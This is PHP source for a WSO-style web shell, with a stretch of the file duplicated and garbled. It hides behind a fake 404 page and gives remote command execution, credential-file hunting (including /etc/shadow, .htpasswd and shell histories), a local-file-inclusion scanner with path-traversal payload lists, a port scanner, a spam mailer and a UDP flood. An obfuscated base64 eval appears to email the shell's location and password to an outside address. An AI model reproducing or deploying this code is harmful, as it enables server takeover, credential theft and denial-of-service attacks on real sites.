"; } $x++; } } } if ( $type == 6 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiftp[$x]) { $res3 = FetchURL($target.$lfiftp[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
"; while($lfiftp[$x]) { $res3 = FetchURL($target.$lfiftp[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiftp[$x]."
"; } else { print "".$target."".$lfiftp[$x]."
"; } else { print "[!] Failed!".$target."".$lfiftp[$x]."
"; } $x++; } } } if ( $type == 7 ) { $res1 = FetchURL($target.$lfitest); $res2 = FetchURL($target.$lfitest2); $rhash1 = md5($res1); $rhash2 = md5($res2); if ($rhash1 != $rhash2) { print "[+] Exploitable! ".$target."".$lfitest."
";{ $res3 = FetchURL($target.$lfiprocenv); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
";{ $res3 = FetchURL($target.$lfiprocenv); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "[+] File detected! ".$target."".$lfiprocenv."
"; } else { print "".$target."".$lfiprocenv."
"; } else { print "[!] Failed!".$target."".$lfiprocenv."
"; } } } } } wsoFooter(); } function actionphptools() { wsoHeader(); ?>
Mailer




'; if (isset($_POST['to']) && isset($_POST['from']) && isset($_POST['subject']) && isset($_POST['body'])) { $headers = 'From: '.$_POST['from']; mail ($_POST['to'],$_POST['subject'],$_POST['body'],$headers); echo 'Email sent.'; } //port scanner echo '
Port Scanner
'; $start = strip_tags($_POST['start']); $end = strip_tags($_POST['end']); $host = strip_tags($_POST['host']); if(isset($_POST['host']) && is_numeric($_POST['end']) && is_numeric($_POST['start'])){ for($i = $start; $i<=$end; $i++){ $fp = @fsockopen($host, $i, $errno, $errstr, 3); if($fp){ echo 'Port '.$i.' is open
'; } flush(); } }else{ ?>
Host:

Port start:

Port end:

"; $max_time = $time+$exec_time; $host = $_POST['host']; for($i=0;$i<65000;$i++){ $out .= 'X'; } while(1){ $pakits++; if(time() > $max_time){ break; } $rand = rand(1,65000); $fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5); if($fp){ fwrite($fp, $out); fclose($fp); } } echo "
UDP Flood
Completed with $pakits (" . round(($pakits*65)/1024, 2) . " MB) packets averaging ". round($pakits/$exec_time, 2) . " packets per second n"; echo '

Host: Length (seconds):
'; }else{ echo '
UDP Flood
Host:

Length (seconds):

'; } ?>
PHP info
'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace('!(body|a:w+|body, td, th, h1, h2) {.*}!msiU','',$tmp); $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); echo str_replace('
" /> ALL Wood Cabinets - Buy Kitchen Cabinets Online
   
Cabinets and Discount Cabinets
 
The Cabinet Factory Shop Kitchen Cabinets Shop Bathroom Cabinets The Design Center Education Center

Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at Port 80
      
"); } if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])])) if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; else wsoLogin(); if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\", "/", $home_cwd); $cwd = str_replace("\", "/", $cwd); } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/'; $wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax']; if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name "config*"", "find config* files in current dir" => "find . -type f -name "config*"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "
"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "".$path[$i]."/"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= ' '; $m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout'; $m['Self remove'] = 'SelfRemove'; $menu = ''; foreach($m as $k => $v) $menu .= '['.$k.']'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\')) $drives .= '[ '.$drive.' ] '; } echo '' . '' . '
Uname:
User:
Php:
Hdd:
Cwd:' . ($GLOBALS['os'] == 'win'?'
Drives:':'') . '
' . substr(@php_uname(), 0, 120) . '
' . $uid . ' ( ' . $user . ' ) Group: ' . $gid . ' ( ' . $group . ' )
' . @phpversion() . ' Safe mode: ' . ($GLOBALS['safe_mode']?'ON':'OFF') . ' [ phpinfo ] Datetime: ' . date('Y-m-d H:i:s') . '
' . wsoViewSize($totalSpace) . ' Free: ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)
' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' [ home ]
' . $drives . '

Server IP:
' . @$_SERVER["SERVER_ADDR"] . '
Client IP:
' . $_SERVER['REMOTE_ADDR'] . '
' . '' . $menu . '
'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" (Writeable)":" (Not writable)"; echo "
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
Upload file:$is_writable

"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '' . wsoPerms(@fileperms($f)) . ''; elseif (!@is_writable($f)) return '' . wsoPerms(@fileperms($f)) . ''; else return '' . wsoPerms(@fileperms($f)) . ''; } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '

Server security information

'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "n") === false) echo $v . '
'; else echo '
' . $v . '
'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '
'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '
'; wsoFooter(); } function actionlfiscan() { wsoHeader(); print '

Led-Zeppelin's LFI File dumper

LFI URL: File: Null: User-Agent:
'; error_reporting(0); if($_POST['lfiurl']) { print "
";           $cheader = $_POST['custom_header'];           $target = $_POST['lfiurl'];           $type = $_POST['scantype'];           $byte1 = $_POST['null'];           $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";           $lfitest2 = "../../../../../../../../../../../../../../fake/file".$byte1."";           $lfiprocenv = "../../../../../../../../../../../../../../proc/environ".$byte1."";           $lfiaccess = array(              1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",              2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",              3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",              4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",              5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",              6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",              7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",              8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",              9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",              10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",              11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",              12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",              13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",              14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",              15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",              16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",              17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",              18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",              19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",              20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",              21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",              22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",              23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");                     $lfierror = array(              1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",              2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",              3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",              4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",              5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",              6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",              7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",              8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",              9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",              10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",              11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",              12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",              13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",              14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",              15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",              16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",              17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",              18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",              19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",              20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",              21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",              22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",              23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");              $lficonfig = array(              1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",              2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",              3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",              4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",              5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",              6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",              7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",              8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",              9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",              10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",              11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",              12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",              13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",              14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",              15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",              16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",              17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",              18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",              19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",              20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",              21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",              22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",              23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",              24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",              25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",              26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",              27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",              28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",              29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",              30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",              31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",              32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",              33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",              34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",              35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");                              $lfiphpini = array(              1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",              2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",              3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",              4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",              5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",              6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",              7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",              8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",              9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",              10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",              11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",              12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",              13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",              14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",              15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",              16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",              17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",              18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",              19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",              20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",              21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",              22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",              23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",              24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",              25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",              26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",              27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");                      $lfimysql = array(              1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",              2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",              3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",              4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",              5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",              6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",              7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",              8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",              9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",              10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");                      $lfiftp = array(              1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",              2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",              3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",              4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",              5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",              6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",              7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",              8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",              9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",              10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",              11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",              12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",              13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",              14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",              15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",              16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",              17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",              18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",              19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",              20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",              21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",              22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",              23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",              24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",              25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",              26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",              27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",              28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",              29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",              30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",              31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",              32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",              33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",              34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",              35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",              36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",              37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",              38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",              39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",              40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",              41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",              42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",              43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",              44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");                        $x = 1;           if ( $type == 1 ) {              $res1 = FetchURL($target.$lfitest);              $res2 = FetchURL($target.$lfitest2);              $rhash1 = md5($res1);              $rhash2 = md5($res2);              if ($rhash1 != $rhash2) {                  print "[+] Exploitable! ".$target."".$lfitest."
"; while($lfiaccess[$x]) { $res3 = FetchURL($target.$lfiaccess[$x]); $rhash3 = md5($res3); if ($rhash3 != $rhash2) { print "".$target."".$lfitest."
